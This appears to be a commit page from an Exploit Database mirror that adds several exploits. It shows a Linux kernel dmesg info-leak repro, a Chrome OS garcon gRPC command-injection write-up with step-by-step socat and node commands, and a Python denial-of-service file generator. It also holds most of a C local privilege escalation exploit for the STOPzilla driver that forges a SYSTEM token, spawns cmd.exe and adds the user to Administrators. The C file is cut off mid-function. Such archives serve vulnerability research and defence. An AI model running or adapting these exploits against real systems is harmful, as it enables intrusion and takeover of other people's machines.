bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-09-14

Browse source 
12 changes to exploits/shellcodes

Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)
MediaTek Wirless Utility rt2870 - Denial of Service (PoC)
TeamViewer App 13.0.100.0 - Denial of Service (PoC)
Linux 4.18 - Arbitrary Kernel Read into dmesg via Missing Address Check in segfault Handler
InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)
STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation
Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)
Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)
Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow
Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket

MyBB 1.8.17 - Cross-Site Scripting
Apache Portals Pluto 3.0.0 - Remote Code Execution
Apache Syncope 2.0.7 - Remote Code Execution
This commit is contained in:
Offensive Security 2018-09-14 05:01:54 +00:00
parent b42759b8b8
commit 2785d40187
13 changed files with 1342 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

96
exploits/linux/dos/45405.txt Normal file
View file

@ -0,0 +1,96 @@
There is a missing address check in both show_opcodes() callers.
show_opcodes() is mostly used by the kernel to print the raw
instruction bytes surrounding an instruction that generated an
unexpected exception; however, sometimes it is also used to
print userspace instructions.
Because the userspace address isn't checked against TASK_SIZE_MAX, if userspace
faults on a kernel address, the kernel can dump data from a user-controlled
address into dmesg.
show_opcodes() has two callers:
- since commit ba54d856a9d8 (first in 4.18): show_signal_msg() shows userspace
instructions when userspace e.g. segfaults
- show_ip() is used when the kernel detects some sort of bug; this means that
to trigger it, you need some way to at least trigger a WARN() or so
Repro for the first variant:
=========================
user@debian:~/segfault$ sudo grep core_pattern /proc/kallsyms
ffffffff9ae34180 D core_pattern
ffffffff9be99500 t _GLOBAL__sub_I_65535_1_core_pattern
ffffffff9bff2860 t _GLOBAL__sub_D_65535_0_core_pattern
user@debian:~/segfault$ cat segfault.c
int main(void) {
void (*fn)(void) = (void*)0xffffffff9ae34180;
fn();
}
user@debian:~/segfault$ gcc -o segfault segfault.c
user@debian:~/segfault$ ./segfault
Segmentation fault
user@debian:~/segfault$ sudo dmesg | tail -n2
[19511.957855] segfault[2622]: segfault at ffffffff9ae34180 ip ffffffff9ae34180 sp 00007ffe0adf1568 error 15
[19511.962055] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <63> 6f 72 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=========================
Note the "<63> 6f 72 65 00" - that's "core\0".
Repro for the second variant:
Patch the kernel like this to get an easy way to trigger a WARN() in the right
context:
=========================
diff --git a/arch/x86/mm/fault.c b/arch/x86/mm/fault.c
index b9123c497e0a..fab40edd4c9e 100644
--- a/arch/x86/mm/fault.c
+++ b/arch/x86/mm/fault.c
@@ -891,6 +891,7 @@ __bad_area_nosemaphore(struct pt_regs *regs, unsigned long error_code,
tsk->thread.trap_nr = X86_TRAP_PF;
force_sig_info_fault(SIGSEGV, si_code, address, tsk, pkey, 0);
+ WARN(1, "TESTING WARN()");
return;
}
=========================
Then run the same repro code as before (with the core_pattern address fixed up).
Result:
=========================
[ 125.564041] segfault[1602]: segfault at ffffffff854340c0 ip ffffffff854340c0 sp 00007ffd4cc7a568 error 15
[ 125.569923] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <63> 6f 72 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 125.576859] ------------[ cut here ]------------
[ 125.578406] TESTING WARN()
[ 125.578439] WARNING: CPU: 6 PID: 1602 at arch/x86/mm/fault.c:894 __bad_area_nosemaphore+0x147/0x270
[ 125.582172] Modules linked in: bpfilter
[ 125.583394] CPU: 6 PID: 1602 Comm: segfault Tainted: G W 4.18.0+ #108
[ 125.585811] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[ 125.588410] RIP: 0010:__bad_area_nosemaphore+0x147/0x270
[ 125.590078] Code: 48 89 d9 48 89 ea 44 89 e6 48 c7 83 30 0b 00 00 0e 00 00 00 bf 0b 00 00 00 e8 f5 eb ff ff 48 c7 c7 00 61 66 84 e8 79 11 05 00 <0f> 0b 48 83 c4 28 5b 5d 41 5c 41 5d 41 5e 41 5f c3 48 83 c4 28 4c
[ 125.595779] RSP: 0018:ffff8801cb3b7e18 EFLAGS: 00010286
[ 125.597426] RAX: 0000000000000000 RBX: ffff8801cbb9e000 RCX: 0000000000000000
[ 125.599605] RDX: 0000000000000001 RSI: dffffc0000000000 RDI: ffffffff86678ea0
[ 125.601800] RBP: ffffffff854340c0 R08: ffffed003d873ed5 R09: ffffed003d873ed5
[ 125.603935] R10: 0000000000000001 R11: ffffed003d873ed4 R12: 0000000000000001
[ 125.606113] R13: 0000000000000000 R14: 0000000000000015 R15: ffff8801cb3b7f58
[ 125.608250] FS: 00007fe30d518700(0000) GS:ffff8801ec380000(0000) knlGS:0000000000000000
[ 125.610608] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 125.612331] CR2: ffffffff854340c0 CR3: 00000001d563e001 CR4: 00000000003606e0
[ 125.614470] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 125.616607] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 125.618736] Call Trace:
[ 125.619475] __do_page_fault+0x133/0x780
[ 125.620646] ? mm_fault_error+0x1b0/0x1b0
[ 125.622236] ? async_page_fault+0x8/0x30
[ 125.623388] async_page_fault+0x1e/0x30
[ 125.624526] RIP: 0033:core_pattern+0x0/0x880
[ 125.625786] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <63> 6f 72 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 125.631208] RSP: 002b:00007ffd4cc7a568 EFLAGS: 00010202
[ 125.632737] RAX: ffffffff854340c0 RBX: 0000000000000000 RCX: 0000000000000000
[ 125.635039] RDX: 00007ffd4cc7a678 RSI: 00007ffd4cc7a668 RDI: 0000000000000001
[ 125.637088] RBP: 00007ffd4cc7a580 R08: 0000562d395106f0 R09: 00007fe30d323cb0
[ 125.639153] R10: 0000000000000000 R11: 00007fe30d0d23c0 R12: 0000562d39510530
[ 125.641183] R13: 00007ffd4cc7a660 R14: 0000000000000000 R15: 0000000000000000
[ 125.643221] ---[ end trace fb20716f9d6369bd ]---
=========================

291
exploits/linux/local/45407.txt Normal file
View file

@ -0,0 +1,291 @@
======================= BUG DESCRIPTION =======================
There is a variety of RPC communication channels between the Chrome OS host
system and the crosvm guest. This bug report focuses on communication on TCP
port 8889, which is used by the "garcon" service.
Among other things, garcon is responsible for:
- sending URLs to be opened from the guest to the host
- telling the host which applications (more precisely, .desktop files) are
installed in the guest, so that the host can display them in the launcher
- telling the guest to launch applications when the user clicks on stuff in the
launcher
garcon uses gRPC, which is an RPC protocol that sends protobufs over plaintext
HTTP/2. (Other system components communicate with the VM over gRPC-over-vsock,
but garcon uses gRPC-over-TCP.) For some command types, the TCP connection is
initiated by the host; for others, it is initiated by the guest. Both guest and
host are listening on [::]:8889; however, the iptables rules of the host prevent
an outside host from simply connecting to those sockets.
However, Chrome OS apps running on the host (and I think also Android apps, but
I haven't tested that) are not affected by such restrictions. This means that a
Chrome OS app with the "Exchange data with any device on the local network or
internet" permission can open a gRPC socket to the guest's garcon (no
authentication required) and send a vm_tools.container.Garcon.LaunchApplication
RPC call to the guest. This RPC call takes two arguments:
// Request protobuf for launching an application in the container.
message LaunchApplicationRequest {
// The ID of the application to launch. This should correspond to an
// identifier for a .desktop file available in the container.
string desktop_file_id = 1;
// Files to pass as arguments when launching the application, if any, given
// as absolute paths within the container's filesystem.
repeated string files = 2;
}
"desktop_file_id" is actually a relative path to a .desktop file without the
".desktop". One preinstalled .desktop file in the VM is for the VIM editor.
"files" is an array of "paths" that should be provided to the application as
arguments - but actually, you can just pass in arbitrary arguments this way.
This only works for applications whose .desktop files permit passing arguments,
but vim.desktop does permit that.
VIM permits passing a VIM command to be executed on startup using the "--cmd"
flag, and a VIM command that starts with an exclamation mark is interpreted as
a shell command.
So in summary, you can execute arbitrary shell commands by sending a gRPC like
this to the VM:
vm_tools.container.Garcon.LaunchApplication({
desktop_file_id: 'vim',
files: [
'--cmd',
'!id>/tmp/owned'
]
})
For my PoC, since I didn't want to try directly speaking gRPC from inside a
Chrome app, I instead built an app that forwards the garcon port to the outside
network, and then connected to garcon from a normal Linux workstation.
Repro instructions are at the bottom of this bug report, under
"REPRO INSTRUCTIONS", but first I'll list a few other things about crosvm that
look interesting from a security perspective.
Because of this issue, and because of the routing issue described below, I
strongly recommend getting rid of TCP-based communication with the VM entirely.
The various other inter-VM socket types that are already used should be more
than sufficient.
======================= RANDOM OBSERVATIONS =======================
This section lists a bunch of things that I haven't written full PoCs for so far,
but that look interesting or bad from a security perspective:
------------------- ROUTING TABLE -------------------
It is possible for a malicious wifi router to get packets from the host-side
garcon RPC endpoint. You might be able to do bad stuff to a Chrome OS
device over the network using this, but I haven't fully tested this yet.
Normally, when you connect the Chrome OS device to a wifi network, the routing
table looks as follows:
localhost / # route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.246.1 0.0.0.0 UG 1 0 0 wlan0
100.115.92.0 0.0.0.0 255.255.255.252 U 0 0 0 arcbr0
100.115.92.4 0.0.0.0 255.255.255.252 U 0 0 0 vmtap0
100.115.92.192 100.115.92.6 255.255.255.240 UG 0 0 0 vmtap0
192.168.246.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0
Routing precedence depends on prefix length; more specific routes take
precedence over the default route. The 100.115.92.192/28 route is the most
specific one for traffic to the VM at 100.115.92.204, so that is the route used
for RPC calls to that IP address.
However, the wifi router can supply routing information that influences the
routing table. By modifying the wifi router's settings and reconnecting the
Chrome OS device, I get the following routing table in Chrome OS:
localhost / # route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 100.115.92.201 0.0.0.0 UG 1 0 0 wlan0
8.8.8.8 100.115.92.201 255.255.255.255 UGH 0 0 0 wlan0
100.115.92.0 0.0.0.0 255.255.255.252 U 0 0 0 arcbr0
100.115.92.4 0.0.0.0 255.255.255.252 U 0 0 0 vmtap0
100.115.92.192 100.115.92.6 255.255.255.240 UG 0 0 0 vmtap0
100.115.92.200 0.0.0.0 255.255.255.248 U 0 0 0 wlan0
Now the 100.115.92.200/29 route pointing to wlan0 takes precedence over the
legitimate 100.115.92.192/28 route. I then told my router to respond to ARP
queries for 100.115.92.204 (the VM's IP) and ran wireshark on the wifi router
while connecting the ChromeOS device to it. I observed a TCP ACK packet coming
in on port 8889, from 100.115.92.5, with the following payload:
00000000 00 00 19 01 04 00 00 00 09 c7 c6 be c4 c3 c2 c1 ........ ........
00000010 c0 00 0c 67 72 70 63 2d 74 69 6d 65 6f 75 74 02 ...grpc- timeout.
00000020 32 53 00 00 2S..
I also got a TCP SYN packet on port 2222 (that's the port on which OpenSSH
listens in the VM).
------------------- SSHFS -------------------
When the user wishes to access the guest's filesystem from the host, sshfs is
used - a FUSE filesystem that uses ssh to interact with sftp-server on the
remote side.
sshfs runs with CAP_SYS_CHOWN, CAP_SETGID, CAP_SETUID and CAP_SYS_ADMIN, and
those privileges are even inherited by the ssh process.
------------------- VIRTIO WAYLAND -------------------
The crosvm host process implements a virtio protocol for Wayland. This is
described as follows in the guest kernel driver:
* Virtio Wayland (virtio_wl or virtwl) is a virtual device that allows a guest
* virtual machine to use a wayland server on the host transparently (to the
* host). This is done by proxying the wayland protocol socket stream verbatim
* between the host and guest over 2 (recv and send) virtio queues. The guest
* can request new wayland server connections to give each guest wayland client
* a different server context. Each host connection's file descriptor is exposed
* to the guest as a virtual file descriptor (VFD). Additionally, the guest can
* request shared memory file descriptors which are also exposed as VFDs. These
* shared memory VFDs are directly writable by the guest via device memory
* injected by the host. Each VFD is sendable along a connection context VFD and
* will appear as ancillary data to the wayland server, just like a message from
* an ordinary wayland client. When the wayland server sends a shared memory
* file descriptor to the client (such as when sending a keymap), a VFD is
* allocated by the device automatically and its memory is injected into as
* device memory.
Note the "verbatim" - as far as I can tell, the host component is not filtering
anything, but just plumbs the wayland traffic straight into the
/run/chrome/wayland-0 socket, on which the chrome browser process is listening.
If I read the code correctly, the low-level parsing of wayland RPCs is then
performed using the C code in libwayland, while the high-level handling of a
bunch of RPCs is done in C++ code in Chrome in src/components/exo/wayland/.
======================= REPRO INSTRUCTIONS =======================
Tested on: "10820.0.0 (Official Build) dev-channel eve"
Switch your Chrome OS victim machine to the dev channel so that the Linux VM
feature becomes available.
Set up a wifi network on which direct connections between machines are permitted,
and connect the victim device to it.
Open the Chrome OS settings. Enable "Linux (Beta)", wait for the install process
to complete, then launch crosvm by clicking the Terminal icon in the launcher.
In the guest OS terminal, determine the container's IP address with "ip addr".
For me, the address is 100.115.92.204, but it seems to change when you
reinstall the container.
On the attacker machine, run
"socat -d TCP-LISTEN:1335,reuseaddr TCP-LISTEN:1336,reuseaddr".
This is just a TCP server that copies data between a client on TCP port 1335
(must connect first) and a client on TCP port 1336.
On the host, unzip garcon_forwarder.zip and load it as unpacked app. Then
open "garcon forwarder" from the launcher, fill in the correct IP addresses, and
press "run". You should see a little bit of hexdump appearing in the app.
On the attacker machine, install nodejs, then, in a folder containing
container_guest.proto:
$ npm install grpc
[...]
$ npm install @grpc/proto-loader
[...]
$ node
> var grpc = require('grpc');
undefined
> var protoLoader = require('@grpc/proto-loader');
undefined
> var packageDefinition = protoLoader.loadSync('./container_guest.proto', {keepCase: true, longs: String, enums: String, defaults: true, oneofs: true});
undefined
> var protoDescriptor = grpc.loadPackageDefinition(packageDefinition);
undefined
> var stub = new protoDescriptor.vm_tools.container.Garcon('localhost:1336', grpc.credentials.createInsecure());
undefined
> stub.launchApplication({desktop_file_id:'vim',files:['--cmd','!id>/tmp/owned']}, function() {console.log(arguments)});
ClientUnaryCall {
domain:
Domain {
domain: null,
_events:
{ removeListener: [Function: updateExceptionCapture],
newListener: [Function: updateExceptionCapture],
error: [Function: debugDomainError] },
_eventsCount: 3,
_maxListeners: undefined,
members: [] },
_events: {},
_eventsCount: 0,
_maxListeners: undefined,
call:
InterceptingCall {
next_call: InterceptingCall { next_call: null, requester: [Object] },
requester: undefined } }
> [Arguments] { '0': null, '1': { success: true, failure_reason: '' } }
At this point, in the garcon forwarder app, you should see this:
activating...
connected to garcon over socket 16
connected to attacker over socket 17
on socket 16, received:
00 00 12 04 00 00 00 00 00 00 04 00 00 ff ff 00 |................|
06 00 00 40 00 fe 03 00 00 00 01 00 00 04 08 00 |...@............|
00 00 00 00 7f ff 00 00 |........|
on socket 17, received:
50 52 49 20 2a 20 48 54 54 50 2f 32 2e 30 0d 0a |PRI * HTTP/2.0..|
0d 0a 53 4d 0d 0a 0d 0a 00 00 24 04 00 00 00 00 |..SM......$.....|
00 00 02 00 00 00 00 00 03 00 00 00 00 00 04 00 |................|
40 00 00 00 05 00 40 00 00 00 06 00 00 20 00 fe |@.....@...... ..|
03 00 00 00 01 00 00 04 08 00 00 00 00 00 00 3f |...............?|
00 01 00 00 08 06 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 |...|
on socket 17, received:
00 01 2b 01 04 00 00 00 01 40 07 3a 73 63 68 65 |..+......@.:sche|
6d 65 04 68 74 74 70 40 07 3a 6d 65 74 68 6f 64 |me.http@.:method|
04 50 4f 53 54 40 0a 3a 61 75 74 68 6f 72 69 74 |.POST@.:authorit|
79 0e 6c 6f 63 61 6c 68 6f 73 74 3a 31 33 33 36 |y.localhost:1336|
40 05 3a 70 61 74 68 2c 2f 76 6d 5f 74 6f 6f 6c |@.:path,/vm_tool|
73 2e 63 6f 6e 74 61 69 6e 65 72 2e 47 61 72 63 |s.container.Garc|
6f 6e 2f 4c 61 75 6e 63 68 41 70 70 6c 69 63 61 |on/LaunchApplica|
74 69 6f 6e 40 02 74 65 08 74 72 61 69 6c 65 72 |tion@.te.trailer|
73 40 0c 63 6f 6e 74 65 6e 74 2d 74 79 70 65 10 |s@.content-type.|
61 70 70 6c 69 63 61 74 69 6f 6e 2f 67 72 70 63 |application/grpc|
40 0a 75 73 65 72 2d 61 67 65 6e 74 3c 67 72 70 |@.user-agent<grp|
63 2d 6e 6f 64 65 2f 31 2e 31 33 2e 30 20 67 72 |c-node/1.13.0 gr|
70 63 2d 63 2f 36 2e 30 2e 30 2d 70 72 65 31 20 |pc-c/6.0.0-pre1 |
28 6c 69 6e 75 78 3b 20 63 68 74 74 70 32 3b 20 |(linux; chttp2; |
67 6c 6f 72 69 6f 73 61 29 40 14 67 72 70 63 2d |gloriosa)@.grpc-|
61 63 63 65 70 74 2d 65 6e 63 6f 64 69 6e 67 15 |accept-encoding.|
69 64 65 6e 74 69 74 79 2c 64 65 66 6c 61 74 65 |identity,deflate|
2c 67 7a 69 70 40 0f 61 63 63 65 70 74 2d 65 6e |,gzip@.accept-en|
63 6f 64 69 6e 67 0d 69 64 65 6e 74 69 74 79 2c |coding.identity,|
67 7a 69 70 00 00 04 08 00 00 00 00 01 00 00 00 |gzip............|
05 00 00 21 00 01 00 00 00 01 00 00 00 00 1c 0a |...!............|
03 76 69 6d 12 05 2d 2d 63 6d 64 12 0e 21 69 64 |.vim..--cmd..!id|
3e 2f 74 6d 70 2f 6f 77 6e 65 64 00 00 04 08 00 |>/tmp/owned.....|
00 00 00 00 00 00 00 05 |........|
on socket 16, received:
00 00 00 04 01 00 00 00 00 00 00 08 06 01 00 00 |................|
00 00 00 00 00 00 00 00 00 00 |..........|
on socket 16, received:
00 00 58 01 04 00 00 00 01 40 07 3a 73 74 61 74 |..X......@.:stat|
75 73 03 32 30 30 40 0c 63 6f 6e 74 65 6e 74 2d |us.200@.content-|
74 79 70 65 10 61 70 70 6c 69 63 61 74 69 6f 6e |type.application|
2f 67 72 70 63 40 14 67 72 70 63 2d 61 63 63 65 |/grpc@.grpc-acce|
70 74 2d 65 6e 63 6f 64 69 6e 67 15 69 64 65 6e |pt-encoding.iden|
74 69 74 79 2c 64 65 66 6c 61 74 65 2c 67 7a 69 |tity,deflate,gzi|
70 00 00 07 00 00 00 00 00 01 00 00 00 00 02 08 |p...............|
01 00 00 0f 01 05 00 00 00 01 40 0b 67 72 70 63 |..........@.grpc|
2d 73 74 61 74 75 73 01 30 |-status.0|
Now, in the Linux VM, you can see the created file:
gjannhtest1@penguin:~$ cat /tmp/owned
uid=1000(gjannhtest1) gid=1000(gjannhtest1) groups=1000(gjannhtest1),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),44(video),46(plugdev),100(users)
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45407.zip

24
exploits/windows/dos/45398.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: MediaTek Wirless Utility rt2870 - Denial of Service (PoC)
# Autor: Lawrence Amer
# Date: 2018-09-13
# Vendor: MediaTek
# Software url: https://click.pstmrk.it/2ts/d86o2zu8ugzlg.cloudfront.net%2Fmediatek-craft%2Fdrivers%2FRT2770_2870_RT307x.zip/K94pHAI/oTs1/oC6CdN114w
# Tested on OS: Windows 7 64-bit , 32-bit
# Description: launch program then click on Add profile setting dialog choose our generate prof file ,
# succesfully reproduce persistent Denial of service every time launch the program again .
#!/usr/bin/python
buffer ="\x41"*3000
start = "["
end = "]"
payload = start+buffer+end
try:
f=open("poc.prof","w")
print "[+] Creating %s Byet evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] file created !"
except:
print "File cannot be created !"

506
exploits/windows/local/45401.c Normal file
View file

@ -0,0 +1,506 @@
/*
# Exploit Title: STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation
# Date: 2018-09-13
# Author: Parvez Anwar (@parvezghh)
# Vendor Homepage: https://www.stopzilla.com/
# Software link: https://download.stopzilla.com/binaries/stopzilla/auto_installer/STOPzillaAntiMalware.msi
# Tested Version: 6.5.2.59
# Driver Version: 3.0.23.0 - szkg64.sys
# Tested on OS: 64bit Windows 7 and Windows 10 (1803)
# CVE ID: N/A
# Vendor fix url - No response from vendor
# Fixed Version - 0day
# Fixed driver ver - 0day
# https://www.greyhathacker.net/?p=1025
*/
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#include <sddl.h>
#pragma comment(lib,"winsta.lib")
#pragma comment(lib,"advapi32.lib")
#define SystemHandleInformation 16
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
void WINAPI WinStationSwitchToServicesSession();
typedef unsigned __int64 QWORD;
typedef struct _SID_BUILTIN
{
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[2];
} SID_BUILTIN, *PSID_BUILTIN;
typedef struct _SID_INTEGRITY
{
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[1];
} SID_INTEGRITY, *PSID_INTEGRITY;
typedef NTSYSAPI NTSTATUS (NTAPI *_ZwCreateToken)(
OUT PHANDLE TokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN TOKEN_TYPE Type,
IN PLUID AuthenticationId,
IN PLARGE_INTEGER ExpirationTime,
IN PTOKEN_USER User,
IN PTOKEN_GROUPS Groups,
IN PTOKEN_PRIVILEGES Privileges,
IN PTOKEN_OWNER Owner,
IN PTOKEN_PRIMARY_GROUP PrimaryGroup,
IN PTOKEN_DEFAULT_DACL DefaultDacl,
IN PTOKEN_SOURCE Source
);
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
QWORD Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
int GetWindowsVersion()
{
int ver = 0;
OSVERSIONINFO osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 1) ver = 1; // Windows 7
if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 2) ver = 2; // Windows 10
return ver;
}
int spawnShell(HANDLE hTokenElevated)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(STARTUPINFO));
ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = "WinSta0\\Default";
if (!CreateProcessAsUser(hTokenElevated, NULL, "C:\\Windows\\System32\\cmd.exe", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError());
return -1;
}
printf("\n[+] Executed command successfully");
printf("\n[*] Switching session . . .\n\n");
WinStationSwitchToServicesSession();
return 0;
}
int AddAccountToAdminGroup(HANDLE hTokenElevated)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
DWORD currentusersize;
char currentuser[100];
char netcommand[MAX_PATH];
ZeroMemory(&si, sizeof(STARTUPINFO));
ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
si.cb = sizeof(STARTUPINFO);
currentusersize = sizeof(currentuser);
if (!GetUserName(currentuser, &currentusersize))
{
printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError());
return -1;
}
printf("\n[*] Adding current user '%s' account to the local administrators group", currentuser);
sprintf(netcommand, "net localgroup Administrators %s /add", currentuser);
if (!CreateProcessAsUser(hTokenElevated, NULL, netcommand, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError());
return -1;
}
printf("\n[+] Executed command successfully\n");
return 0;
}
PTOKEN_PRIVILEGES SetPrivileges()
{
PTOKEN_PRIVILEGES privileges;
LUID luid;
int NumOfPrivileges = 5;
int nBufferSize;
nBufferSize = sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES) * NumOfPrivileges;
privileges = (PTOKEN_PRIVILEGES) LocalAlloc(LPTR, nBufferSize);
privileges->PrivilegeCount = NumOfPrivileges;
LookupPrivilegeValue(NULL, SE_TCB_NAME, &luid);
privileges->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[0].Luid = luid;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
privileges->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[1].Luid = luid;
LookupPrivilegeValue(NULL, SE_ASSIGNPRIMARYTOKEN_NAME, &luid);
privileges->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[2].Luid = luid;
LookupPrivilegeValue(NULL, SE_TAKE_OWNERSHIP_NAME, &luid);
privileges->Privileges[3].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[3].Luid = luid;
LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, &luid);
privileges->Privileges[4].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[4].Luid = luid;
return privileges;
}
PSID GetLocalSystemSID()
{
PSID psid = NULL;
SID_IDENTIFIER_AUTHORITY sidAuth = SECURITY_NT_AUTHORITY;
if (AllocateAndInitializeSid(&sidAuth, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &psid) == FALSE)
{
printf("\n[-] AllocateAndInitializeSid failed %d\n", GetLastError());
return NULL;
}
return psid;
}
LPVOID GetInfoFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS type)
{
DWORD dwLengthNeeded;
LPVOID lpData = NULL;
if (!GetTokenInformation(hToken, type, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
{
printf("\n[-] Failed to initialize GetTokenInformation %d", GetLastError());
return NULL;
}
lpData = (LPVOID)LocalAlloc(LPTR, dwLengthNeeded);
GetTokenInformation(hToken, type, lpData, dwLengthNeeded, &dwLengthNeeded);
return lpData;
}
QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID)
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo;
ULONG i;
PSYSTEM_HANDLE pHandle;
QWORD TokenAddress = 0;
DWORD nSize = 4096;
DWORD nReturn;
BOOL tProcess;
HANDLE hToken;
if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
{
printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
return -1;
}
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
do
{
nSize += 4096;
pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize);
} while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);
for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
{
if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken)
{
TokenAddress = pSysHandleInfo->Handles[i].Object;
}
}
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return TokenAddress;
}
HANDLE CreateUserToken(HANDLE hToken)
{
_ZwCreateToken ZwCreateToken;
HANDLE hTokenElevated;
NTSTATUS status;
int i;
DWORD dwSize = 0;
TOKEN_USER userToken;
PTOKEN_PRIVILEGES privileges = NULL;
PTOKEN_OWNER ownerToken = NULL;
PTOKEN_GROUPS groups = NULL;
PTOKEN_PRIMARY_GROUP primary_group = NULL;
PTOKEN_DEFAULT_DACL default_dacl = NULL;
PLUID pluidAuth;
LARGE_INTEGER li;
PLARGE_INTEGER pli;
LUID authid = SYSTEM_LUID;
LUID luid;
PSID_AND_ATTRIBUTES pSid;
SID_BUILTIN TkSidLocalAdminGroup = { 1, 2, { 0, 0, 0, 0, 0, 5 }, { 32, DOMAIN_ALIAS_RID_ADMINS } };
SECURITY_QUALITY_OF_SERVICE sqos = { sizeof(sqos), SecurityImpersonation, SECURITY_STATIC_TRACKING, FALSE };
OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, 0, 0, 0, &sqos };
